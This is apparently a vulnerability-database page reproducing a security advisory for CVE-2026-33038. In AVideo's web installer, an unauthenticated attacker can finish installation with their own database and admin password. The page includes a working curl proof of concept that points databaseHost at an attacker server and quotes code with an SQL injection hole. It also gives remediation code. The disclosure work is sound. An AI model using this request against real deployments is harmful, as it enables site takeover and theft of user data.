Skip to main content

PHP CVE-2026-33038

HIGH
Missing Authentication for Critical Function (CWE-306)
2026-03-17 https://github.com/WWBN/AVideo GHSA-2f9h-23f7-8gcx
8.1
CVSS 3.1 · GitHub Advisory
Share

Severity by source

GitHub Advisory PRIMARY
8.1 HIGH
AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Primary rating from GitHub Advisory · only source for this CVE.

CVSS VectorGitHub Advisory

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
Attack Vector
Network
Attack Complexity
High
Privileges Required
None
User Interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
High

Lifecycle Timeline

3
Analysis Generated
Mar 17, 2026 - 20:30 vuln.today
Patch released
Mar 17, 2026 - 20:30 nvd
Patch available
CVE Published
Mar 17, 2026 - 19:46 nvd
HIGH 8.1

DescriptionGitHub Advisory

Summary

The install/checkConfiguration.php endpoint performs full application initialization - database setup, admin account creation, and configuration file write - from unauthenticated POST input. The only guard is checking whether videos/configuration.php already exists. On uninitialized deployments, any remote attacker can complete the installation with attacker-controlled credentials and an attacker-controlled database, gaining full administrative access.

Affected Component

  • install/checkConfiguration.php - entire file (lines 1-273)

Description

No authentication or access restriction on installer endpoint

The checkConfiguration.php file performs the most privileged operations in the application - creating the database schema, the admin account, and the configuration file - with no authentication, no setup token, no CSRF protection, and no IP restriction. The sole guard is a file-existence check:

php
// install/checkConfiguration.php - lines 2-5
if (file_exists("../videos/configuration.php")) {
    error_log("Can not create configuration again: ".  json_encode($_SERVER));
    exit;
}

If videos/configuration.php does not exist (fresh deployment, container restart without persistent storage, re-deployment), the entire installer runs with attacker-controlled POST parameters.

Attacker-controlled database host eliminates credential guessing

Unlike typical installer exposure vulnerabilities where the attacker must guess the target's database credentials, this endpoint allows the attacker to supply their own database host:

php
// install/checkConfiguration.php - line 25
$mysqli = @new mysqli($_POST['databaseHost'], $_POST['databaseUser'], $_POST['databasePass'], "", $_POST['databasePort']);

The attacker can:

  1. Run their own MySQL server with the AVideo schema pre-loaded
  2. Set databaseHost to their server's IP
  3. The connection succeeds (attacker controls the DB)
  4. The configuration file is written pointing the application at the attacker's database permanently

Admin account creation with unsanitized input

The admin user is created with direct POST parameter concatenation into SQL:

php
// install/checkConfiguration.php - line 120
$sql = "INSERT INTO users (id, user, email, password, created, modified, isAdmin) VALUES (1, 'admin', '"
     . $_POST['contactEmail'] . "', '" . md5($_POST['systemAdminPass']) . "', now(), now(), true)";

This has two issues: (1) the attacker controls the admin password, and (2) $_POST['contactEmail'] is directly concatenated into SQL without escaping (SQL injection).

Configuration file written with attacker-controlled values

The configuration file is written to disk with all attacker-supplied values embedded:

php
// install/checkConfiguration.php - lines 238-247
$videosDir = $_POST['systemRootPath'].'videos/';

if(!is_dir($videosDir)){
    mkdir($videosDir, 0777, true);
}

$fp = fopen("{$videosDir}configuration.php", "wb");
fwrite($fp, $content);
fclose($fp);

The $content variable (built at lines 188-236) embeds $_POST['databaseHost'], $_POST['databaseUser'], $_POST['databasePass'], $_POST['webSiteRootURL'], $_POST['systemRootPath'], and $_POST['salt'] directly into the PHP configuration file.

Inconsistent defense: CLI installer is protected, web endpoint is not

The CLI installer (install/install.php) properly restricts access:

php
// install/install.php - lines 3-5
if (!isCommandLineInterface()) {
    die('Command Line only');
}

The web endpoint (checkConfiguration.php) lacks any equivalent protection, creating an inconsistent defense pattern.

No web server protection on install directory

There is no .htaccess file in the install/ directory. The root .htaccess does not block access to install/. The endpoint is directly accessible at /install/checkConfiguration.php.

Execution chain

  1. Attacker discovers an AVideo instance where videos/configuration.php does not exist (fresh or re-deployed)
  2. Attacker sends POST to /install/checkConfiguration.php with their own database host, admin password, and site configuration
  3. The script connects to the attacker's database (or the target's with guessed/default credentials)
  4. Tables are created, admin user is inserted with attacker's password
  5. configuration.php is written to disk, permanently configuring the application
  6. Attacker logs in as admin with full control over the application

Proof of Concept

Step 1: Set up an attacker-controlled MySQL server with the AVideo schema:

bash
# On attacker's server
mysql -e "CREATE DATABASE avideo;"
mysql avideo < database.sql
# Use AVideo's own schema file

Step 2: Send the installation request to the target:

bash
curl -s -X POST https://TARGET/install/checkConfiguration.php \
  -d 'systemRootPath=/var/www/html/AVideo/' \
  -d 'databaseHost=ATTACKER_MYSQL_IP' \
  -d 'databasePort=3306' \
  -d 'databaseUser=attacker' \
  -d 'databasePass=attacker_pass' \
  -d 'databaseName=avideo' \
  -d 'createTables=1' \
  -d 'contactEmail=attacker@example.com' \
  -d 'systemAdminPass=AttackerPass123!' \
  -d 'webSiteTitle=Pwned' \
  -d 'mainLanguage=en_US' \
  -d 'webSiteRootURL=https://TARGET/'

Step 3: Log in as admin:

Username: admin
Password: AttackerPass123!

The attacker now has full administrative access. If using their own database, they control all application data.

Impact

  • Full application takeover: Attacker becomes the sole admin with complete control
  • Persistent backdoor via configuration: The videos/configuration.php file is written with attacker-controlled database credentials, ensuring persistent access even after the attack
  • Data exfiltration: If pointing to the attacker's database, all future user data (registrations, uploads, comments) flows to the attacker
  • Remote code execution potential: Admin access in AVideo enables file uploads and plugin management, which can lead to arbitrary PHP execution
  • SQL injection bonus: $_POST['contactEmail'] on line 120 is directly concatenated into SQL, allowing additional database manipulation

Recommended Remediation

Option 1: Add a one-time setup token (preferred)

Generate a random setup token during deployment that must be provided to complete installation:

php
// At the top of install/checkConfiguration.php, after the file_exists check:

// Require a setup token that was generated during deployment
$setupTokenFile = __DIR__ . '/../videos/.setup_token';
if (!file_exists($setupTokenFile)) {
    $obj = new stdClass();
    $obj->error = "Setup token file not found. Create videos/.setup_token with a random secret.";
    header('Content-Type: application/json');
    echo json_encode($obj);
    exit;
}

$expectedToken = trim(file_get_contents($setupTokenFile));
if (empty($_POST['setupToken']) || !hash_equals($expectedToken, $_POST['setupToken'])) {
    $obj = new stdClass();
    $obj->error = "Invalid setup token.";
    header('Content-Type: application/json');
    echo json_encode($obj);
    exit;
}

Option 2: Restrict installer to localhost/CLI only

Block web access to the installer entirely:

php
// At the top of install/checkConfiguration.php, after the file_exists check:
if (!isCommandLineInterface()) {
    $allowedIPs = ['127.0.0.1', '::1'];
    if (!in_array($_SERVER['REMOTE_ADDR'], $allowedIPs)) {
        header('Content-Type: application/json');
        echo json_encode(['error' => 'Installation is only allowed from localhost']);
        exit;
    }
}

Additionally, add an .htaccess file in the install/ directory:

apache
# install/.htaccess
<Files "checkConfiguration.php">
    Require local
</Files>

Additional fixes needed

  1. Parameterize SQL queries on line 120 to prevent SQL injection:
php
$stmt = $mysqli->prepare("INSERT INTO users (id, user, email, password, created, modified, isAdmin) VALUES (1, 'admin', ?, ?, now(), now(), true)");
$hashedPass = md5($_POST['systemAdminPass']); // Also: upgrade from md5 to password_hash()
$stmt->bind_param("ss", $_POST['contactEmail'], $hashedPass);
$stmt->execute();
  1. Upgrade password hashing from md5() to password_hash() with PASSWORD_BCRYPT or PASSWORD_ARGON2ID.

Credit

This vulnerability was discovered and reported by bugbunny.ai.

AnalysisAI

A critical authentication bypass vulnerability in AVideo's installation endpoint allows unauthenticated remote attackers to take over uninitialized deployments by completing the installation process with attacker-controlled credentials and database settings. The vulnerability affects AVideo installations where the configuration file does not exist (fresh deployments, container restarts without persistent storage, or re-deployments), enabling attackers to become the sole administrator with full control over the application. A detailed proof-of-concept is publicly available, and while no active exploitation has been reported in KEV, the vulnerability has a moderate EPSS score and requires only network access to exploit.

Technical ContextAI

AVideo is a PHP-based video streaming platform identified by CPE pkg:composer/wwbn_avideo. The vulnerability stems from CWE-306 (Missing Authentication for Critical Function) in the install/checkConfiguration.php endpoint, which performs privileged operations including database schema creation, admin account creation, and configuration file generation without any authentication mechanisms. Unlike the CLI installer which properly restricts access, the web-accessible endpoint only checks if videos/configuration.php exists before allowing full application initialization with user-supplied POST parameters, including the ability to specify an external database host that eliminates the need for credential guessing.

RemediationAI

Apply the vendor patch immediately by updating to the fixed version containing commit b3fa7869dcb935c8ab5c001a88dc29d2f92cf8e1 as detailed in the GitHub security advisory at https://github.com/WWBN/AVideo/security/advisories/GHSA-2f9h-23f7-8gcx. For deployments that cannot patch immediately, implement emergency mitigations by blocking web access to /install/checkConfiguration.php via web server configuration rules or by creating a dummy videos/configuration.php file if the application is already configured. Organizations should also implement deployment procedures that ensure the installer is disabled or removed after initial setup and consider using setup tokens for any future installations.

More in PHP

View all
CVE-2012-1823 CRITICAL POC
9.8 May 11

sapi/cgi/cgi_main.c in PHP before 5.3.12 and 5.4.x before 5.4.2, when configured as a CGI script (aka php-cgi), does not

CVE-2016-1555 CRITICAL POC
9.8 Apr 21

(1) boardData102.php, (2) boardData103.php, (3) boardDataJP.php, (4) boardDataNA.php, and (5) boardDataWW.php in Netgear

CVE-2024-11680 CRITICAL POC
9.8 Nov 26

ProjectSend versions prior to r1720 are affected by an improper authentication vulnerability. Rated critical severity (C

CVE-2025-49113 CRITICAL POC
9.9 Jun 02

Roundcube Webmail contains a critical PHP object deserialization vulnerability (CVE-2025-49113, CVSS 9.9) that allows au

CVE-2017-9841 CRITICAL POC
9.8 Jun 27

Util/PHP/eval-stdin.php in PHPUnit before 4.8.28 and 5.x before 5.6.3 allows remote attackers to execute arbitrary PHP c

CVE-2025-0108 HIGH POC
8.8 Feb 12

Palo Alto Networks PAN-OS management web interface contains an authentication bypass allowing unauthenticated attackers

CVE-2021-25298 HIGH POC
8.8 Feb 15

Nagios XI version xi-5.7.5 is affected by OS command injection. Rated high severity (CVSS 8.8), this vulnerability is re

CVE-2021-25296 HIGH POC
8.8 Feb 15

Nagios XI version xi-5.7.5 is affected by OS command injection. Rated high severity (CVSS 8.8), this vulnerability is re

CVE-2013-4983 CRITICAL POC
10.0 Sep 10

The get_referers function in /opt/ws/bin/sblistpack in Sophos Web Appliance before 3.7.9.1 and 3.8 before 3.8.1.1 allows

CVE-2023-6553 CRITICAL POC
9.8 Dec 15

The Backup Migration plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1

CVE-2024-46506 CRITICAL POC
10.0 May 13

NetAlertX (formerly PiAlert) versions 23.01.14 through 24.x before 24.10.12 allow unauthenticated command injection thro

CVE-2024-8353 CRITICAL POC
9.8 Sep 28

The GiveWP - Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to PHP Object Injection in all

Share

CVE-2026-33038 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy